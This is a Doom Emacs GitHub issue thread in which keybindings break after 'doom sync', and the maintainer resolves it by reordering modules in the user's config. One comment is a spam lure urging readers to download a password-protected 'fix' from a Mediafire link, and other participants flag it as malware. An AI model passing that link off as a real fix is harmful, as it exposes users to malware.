### ISSUE TITLE
doom sync & doom upgrade break Doom Emacs

### ISSUE THREAD

**Issue by pythonian23** [doomemacs/doomemacs#8026]
### I confirm that...

- [X] I have searched the [issue tracker](https://github.com/doomemacs/doomemacs/issues), [documentation](https://docs.doomemacs.org), [FAQ](https://docs.doomemacs.org/-/faq), [Discourse](https://discourse.doomemacs.org), and [Google](https://google.com), in case this issue has already been reported/resolved.
- [X] I have read "[How to Debug Issues](https://doomemacs.org/d/how2debug)", and will use it to provide as much information about this issue as possible.
- [X] The issue can be reproduced on the **latest** available commit of Doom.
- [X] The issue can be reproduced on a stable release of Emacs, such as 27, 28, or 29. *(Unstable versions end in .50, .60, or .9x)*

### Expected behavior

After running `doom sync` and/or `doom upgrade`, Doom Emacs should function with all of its builtin keybindings working.

### Current behavior

After running `doom sync` and/or `doom upgrade`, a majority of the default keybindings are unset. For example, `SPC b is undefined`.
`doom install`, on the other hand, functions normally.

I believe the issue is originating from differences `.config/emacs/.local/@/init.29.el`, and I've attached the files after `doom install` and `doom init` below.

In addition, it seems that `M-x doom/reload` temporarily fixes the problem (it returns after restarting Emacs)

[install.el.txt](https://github.com/user-attachments/files/16751874/install.el.txt) - `.config/emacs/.local/@/init.29.el` after `doom install`; presumably how things should be (all `(` replaced with `\n(` to make diff work)
[sync.el.txt](https://github.com/user-attachments/files/16751875/sync.el.txt) - `.config/emacs/.local/@/init.29.el` after `doom sync` (all `(` replaced with `\n(` to make diff work)
[i2s.el.diff.txt](https://github.com/user-attachments/files/16751873/i2s.el.diff.txt) - diff

### Steps to reproduce

1. Run `doom sync`
2. Open Emacs - broken
3. Run `doom install`
4. Open Emacs - fixed

**`M-x doom/info`**
> `doom install` - https://pastebin.com/44rNqNnx
> `doom sync` - https://pastebin.com/tpVbmdXZ

### System Information

Above

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by pythonian23** [comment]
oh god virusman is here too

**Comment by gagbo** [comment]
> oh god virusman is here too

Sorry for that

**Comment by hlissner** [comment]
Please check [the \*Messages\* buffer](https://discourse.doomemacs.org/t/how-to-debug-issues/55) for errors at startup. Keybindings are often the first casualty to startup errors. If you find an error, please produce [a backtrace](https://discourse.doomemacs.org/t/what-is-a-backtrace-how-to-produce-them/85) from it as well.

**Comment by pythonian23** [comment]
There aren't errors happening on startup - the message buffer is normal

**Comment by hlissner** [comment]
I notice that the order of modules is different when you use `doom sync`, but I can't reproduce it. It's your config up somewhere I can see it?

**Comment by pythonian23** [comment]
Here's my doom config: https://github.com/pythonian23/dotfiles/tree/main/.config/doom

**Comment by hlissner** [comment]
It seems it's `doom install` that gets the module list backwards. I notice you have `:config default` very high in your `doom!`. Order matters for the `:config` and `:app` groups (they should be at the bottom), so moving them there should fix your issue as far as `doom sync` is concerned. Still looking into the discrepancy though.

**Comment by pythonian23** [comment]
It works again! Thanks :D
